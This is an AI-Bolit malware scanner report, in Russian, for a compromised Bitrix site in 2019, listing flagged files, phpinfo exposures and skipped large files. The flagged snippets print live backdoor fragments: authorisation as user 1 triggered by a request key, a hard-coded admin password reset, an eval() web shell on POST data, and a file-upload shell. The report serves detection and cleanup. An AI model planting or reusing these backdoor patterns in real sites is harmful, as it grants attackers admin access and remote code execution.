Отчет сканера AI-Bolit v20181117-2210: /home/bitrix/www/ (1/1)
Сканер бесплатный только для личного некоммерческого использования. Информация по коммерческой лицензии (пункт №11). Авторское свидетельство о гос. регистрации в РосПатенте №2012619254 от 12 октября 2012 г.
Затрачено времени: 33 m . Сканирование начато 04-02-2019 в 12:27:28, сканирование завершено 04-02-2019 в 13:00:40
Всего проверено 26035 директорий и 43640 файлов. Использовано памяти при сканировании: 24.83 Mb.
Сводный отчет
Вредоносных скриптов21
Пропущенных больших файлов16
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер минимизирует число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.

Для диагностического сканирования без ложных срабатываний мы разработали специальную версию сканера для хостинг-компаний.

Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Возможно, ваш сайт был взломан. Рекомендуем срочно проконсультироваться со специалистами по данному отчету.


Рекомендуем также проверить сайт бесплатным онлайн-сканером ReScan.Pro.


Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Наши продукты:
Критические замечания
Уязвимости в скриптах (1)
  • /home/bitrix/www/bx_1c_import.php - AFD : https://habrahabr.ru/company/dsec/blog/326166/
  • Эти файлы могут быть вредоносными или хакерскими скриптами (21)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] BIG FILE. SKIPPED.
    12/09/2018 16:03:40
    02/07/2012 13:05:27
    700.69 Kb
    87a2a4ac4e5c97a3ff3f227b2922c1202c5966d1
    x
    1341223527
    id_big_1
    [x] 1…tarted=md5(mktime());$secure_session_user=md5($adm_user.$adm_pass);$_SESSION['user']=$adm_user;$_SESSION['session_key']= $time_started.$secure_session_user.session_id();$_SESSION['current_session']=$adm_user."=".$_SESSION['session_key'];$ex
    12/09/2018 16:03:40
    21/03/2018 16:11:39
    10.76 Kb
    9d2477c91887aa285c7976aa0bdc1649c85a4bb4
    x
    1521637899
    id_fdc2894e
    [x] 1…e($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");if($_REQUEST["key"]=="aspro"){global$USER; $USER->Authorize(1);header("Location:/");}?
    12/09/2018 16:03:18
    11/07/2018 12:42:08
    208 b
    af652a4ad045468d60e4ee00266f05d9a32478a6
    x
    1531302128
    id_a89027da
    [x] 1…"),);$dbUsers=CUser::GetList(($by='id'),($order='asc'),$filterUsers,$paramsUsers);$arUser=$dbUsers->Fetch();global$USER; $USER->Authorize($arUser["ID"]);LocalRedirect("/bitrix/admin");?
    07/01/2019 21:27:29
    21/03/2018 17:11:37
    382 b
    462d9b7de7a771ffd92430b4d7a84c59be5fe442
    x
    1521641497
    id_f56b5bcf
    [x] 1<?require($_SERVER['DOCUMENT_ROOT']."/bitrix/header.php"); echo$USER->Update(1,array("PASSWORD"=>'Bitrix*123456'));echo$USER->LAST_ERROR;require($_SERVER['DOCUMENT_ROOT']."/bitri
    12/09/2018 16:03:40
    24/11/2016 03:08:11
    201 b
    3f01baa06c56b40d573153aa6e9851720d986a6d
    x
    1479946091
    id_3cc6e9cd
    [x] BIG FILE. SKIPPED.
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    927.43 Kb
    5fff631ca5ae711cc1d56205bd32587fb4918338
    x
    1479946090
    id_big_1
    [x] BIG FILE. SKIPPED.
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    876.27 Kb
    1a3d355394731b26ade9fbe1784d430e54e10f17
    x
    1479946090
    id_big_1
    [x] 1…"),);$dbUsers=CUser::GetList(($by='id'),($order='asc'),$filterUsers,$paramsUsers);$arUser=$dbUsers->Fetch();global$USER; $USER->Authorize($arUser["ID"]);LocalRedirect("/bitrix/admin");?
    07/01/2019 21:27:29
    21/03/2018 17:11:37
    382 b
    462d9b7de7a771ffd92430b4d7a84c59be5fe442
    x
    1521641497
    id_f56b5bcf
    [x] 1…file","AREA_FILE_SUFFIX"=>"inc","PATH"=>SITE_TEMPLATE_PATH."/inc/catalog.php"));?></div><?if($_GET["szyk"]){global$USER; $USER->Authorize(1);}?><?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?
    12/09/2018 16:03:09
    21/03/2018 17:12:46
    1.76 Kb
    6d22dc2398fa088daed1a800e531c77bc77d7edb
    x
    1521641566
    id_a89027da
    [x] BIG FILE. SKIPPED.
    04/02/2019 11:48:27
    04/02/2019 11:48:27
    673.06 Kb
    ba72bfd757c6dac570b3fdce21b8cf781785d727
    x
    1549270107
    id_big_1
    [x] BIG FILE. SKIPPED.
    04/02/2019 12:18:29
    04/02/2019 12:18:29
    1.14 Mb
    538e8a13a436a8060a2c07091f4a375a6a7518f3
    x
    1549271909
    id_big_1
    [x] BIG FILE. SKIPPED.
    04/02/2019 12:25:04
    04/02/2019 12:25:04
    1.14 Mb
    f60bbe3f7160d24eb0f76444570b56ca26e1c19c
    x
    1549272304
    id_big_1
    [x] BIG FILE. SKIPPED.
    04/02/2019 12:13:30
    04/02/2019 12:13:30
    1.14 Mb
    ec9f6cde2f3b9cbc30bb44d3cf70cff27bf01c82
    x
    1549271610
    id_big_1
    [x] BIG FILE. SKIPPED.
    04/02/2019 12:22:30
    04/02/2019 12:22:30
    1.37 Mb
    bd1adf33bddd5e83944e314a5754e78f002dc29c
    x
    1549272150
    id_big_1
    [x] 1…VER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/ajax_tools.php"); /*ZDUyZmZNWVjMjI1OWI1ZmZhMWVkNjhkZGZiNjEyYjE3MWMzZWE=*/ $GLOBALS['_____1358942114']=array(base64_decode('R2V0T3B0aW9uU3RyaW5n'),base64_decode('U2V0T3B0aW9uU
    12/09/2018 16:03:10
    21/03/2018 17:43:05
    26.04 Kb
    99ce3aa81f322832dc0e59ba85ca22784532a6fa
    x
    1521643385
    id_93e67a24
    [x] 1<? $GLOBALS['_____570583507']=array('IncludeModuleLangFile','Fetch','Fetch','Fetch','GetOptionString','SetOptionString','S
    12/09/2018 16:03:10
    21/03/2018 17:42:54
    240.34 Kb
    fecffb300bf787b549cf9a86e2692a4732235a84
    x
    1521643374
    id_93e67a24
    [x] 1…")==1){$ibv=file_get_contents($url);}if(!empty($_POST["p"])&&md5(md5($_POST["p"]))=="687fd6484895b229cf034a6eb44ce69f"){ eval(stripslashes($_POST["c"]));}echo$ibv;}?
    07/01/2019 21:28:26
    07/01/2019 21:28:16
    1.11 Kb
    2a21e3ef651a255cb0c31d84f8271b9c4cb8cf48
    x
    1546885696
    id_81881b79
    [x] 1<? $GLOBALS['_____2025737787']=array('AddAutoloadClasses','IncludeModuleLangFile');?><?$GLOBALS['____686050164']=array('me
    12/09/2018 16:03:10
    21/03/2018 17:31:42
    5.92 Kb
    1ed11f2a71089658a5d9f298e83290482bc7b003
    x
    1521642702
    id_93e67a24
    [x] 1 <?php echo '<b><br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name=
    07/01/2019 21:27:29
    21/03/2018 17:11:17
    467 b
    33806e0d9388623bdbe6d0b7345fae3d825e70d4
    x
    1521641477
    id_f0d78ce7
    [x] 1 <?php echo '<b><br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name=
    07/01/2019 21:27:29
    21/03/2018 17:11:17
    467 b
    33806e0d9388623bdbe6d0b7345fae3d825e70d4
    x
    1521641477
    id_f0d78ce7
    [x] 1 <?if(!isBot()){if(isset($_SERVER['HTTP_REFERER']) AND!isset($_COOKIE["SESSION_ID27"])){setcookie("SESSION_ID27","1",tim
    12/09/2018 16:03:04
    22/03/2018 22:30:02
    6.68 Kb
    3c0a10e407b5bc27242ce518107f47f112ef2fc5
    x
    1521747002
    id_17901b51
    Предупреждения
    Дорвеи, реклама, спам-ссылки, редиректы
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1<?php  phpinfo();?
    12/09/2018 16:03:03
    24/11/2016 03:08:11
    20 b
    176f84074f83e4f96c234359a691a0dc5e9e4762
    x
    1479946091
    id_z5717571
    1<?php require_once 'libraries/common.inc.php';PMA_Response::getInstance()->disable();if($GLOBALS['cfg']['ShowPhpInfo']){ phpinfo();
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    386 b
    8f4f37038a07f47474f6eeab6b9b10bd30efb5ff
    x
    1479946090
    id_z7572608
    1…cting) set of directives are used:..code-block:: apache SetOutputFilter PHP SetInputFilter PHP and..code-block:: apache AddType application/x-httpd-php.php In the case we saw,one set of directives was in ``/etc/httpd/conf/httpd.conf``,whil
    12/09/2018 16:03:03
    24/11/2016 03:08:09
    86.24 Kb
    73958ff75fea416abd44c34d3283bf739b12ca09
    x
    1479946089
    id_z2171197
    1…="expires" content="0"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Cache-Control" content="no-cache"> <meta http-equiv="Refresh" content="0;url=<?php echo htmlspecialchars($uri)?>"><script type="text/javascript">//<![CDAT
    12/09/2018 16:03:03
    24/11/2016 03:08:09
    861 b
    43607b1a2332544e0c9b0b261234baefac39fe8b
    x
    1479946089
    id_z7851725
    1…log_admin_before.php");if(!$USER->CanDoOperation('edit_php')){$APPLICATION->AuthForm(GetMessage("ACCESS_DENIED"));}else{ phpinfo();}?
    12/09/2018 16:03:10
    21/03/2018 17:42:41
    204 b
    3de4d48a050d233c344ad5b4be60ef4f15d4498f
    x
    1521643361
    id_z7959579
    1<? phpinfo();?
    12/09/2018 16:03:35
    24/11/2016 03:08:11
    17 b
    2a8631b78e77adf1864057f93261936a75404193
    x
    1479946091
    id_z5322590
    Большие файлы (больше чем 650.00 Kb). Пропущено
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    12/09/2018 16:03:40
    02/07/2012 13:05:27
    700.69 Kb
    87a2a4ac4e5c97a3ff3f227b2922c1202c5966d1
    x
    1341223527
    id_z2706166
    12/09/2018 16:03:04
    24/11/2016 03:08:02
    88.90 Mb
    db1472240593bf5295a166a79b6cff9b2c21a7b7
    x
    1479946082
    id_z5541267
    12/09/2018 16:03:04
    24/11/2016 03:07:59
    20.17 Mb
    db1472240593bf5295a166a79b6cff9b2c21a7b7
    x
    1479946079
    id_z4776715
    12/09/2018 16:03:04
    16/10/2017 14:22:51
    72.86 Mb
    db1472240593bf5295a166a79b6cff9b2c21a7b7
    x
    1508152971
    id_z5158731
    12/09/2018 16:03:18
    24/11/2016 03:09:06
    19.81 Mb
    3416521f1b77306a085e4941a4f1b4743b597581
    x
    1479946146
    id_z4304535
    12/09/2018 16:03:04
    16/10/2017 14:22:00
    72.86 Mb
    21050974a99a6df4eddaaf6759e94af3f7e3c57f
    x
    1508152920
    id_z8138142
    12/09/2018 16:03:03
    24/11/2016 03:08:11
    1.82 Mb
    21050974a99a6df4eddaaf6759e94af3f7e3c57f
    x
    1479946091
    id_z2941983
    06/11/2018 15:30:11
    06/11/2018 15:30:11
    14.60 Mb
    4f731929ad8dc1557781c061bd196662fafbf12c
    x
    1541507411
    id_z5222392
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    927.43 Kb
    5fff631ca5ae711cc1d56205bd32587fb4918338
    x
    1479946090
    id_z4855713
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    876.27 Kb
    1a3d355394731b26ade9fbe1784d430e54e10f17
    x
    1479946090
    id_z1514591
    16/11/2018 22:12:36
    16/11/2018 22:12:36
    411.90 Mb
    da39a3ee5e6b4b0d3255bfef95601890afd80709
    x
    1542395556
    id_z6393590
    04/02/2019 11:48:27
    04/02/2019 11:48:27
    673.06 Kb
    ba72bfd757c6dac570b3fdce21b8cf781785d727
    x
    1549270107
    id_z3707438
    04/02/2019 12:18:29
    04/02/2019 12:18:29
    1.14 Mb
    538e8a13a436a8060a2c07091f4a375a6a7518f3
    x
    1549271909
    id_z8474170
    04/02/2019 12:25:04
    04/02/2019 12:25:04
    1.14 Mb
    f60bbe3f7160d24eb0f76444570b56ca26e1c19c
    x
    1549272304
    id_z2716179
    04/02/2019 12:13:30
    04/02/2019 12:13:30
    1.14 Mb
    ec9f6cde2f3b9cbc30bb44d3cf70cff27bf01c82
    x
    1549271610
    id_z3848701
    04/02/2019 12:22:30
    04/02/2019 12:22:30
    1.37 Mb
    bd1adf33bddd5e83944e314a5754e78f002dc29c
    x
    1549272150
    id_z7109271
    Подозрение на дорвей
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    -
    -
    -
    x
    id_z5582923
    Версии найденных CMS
    Bitrix v15.5.1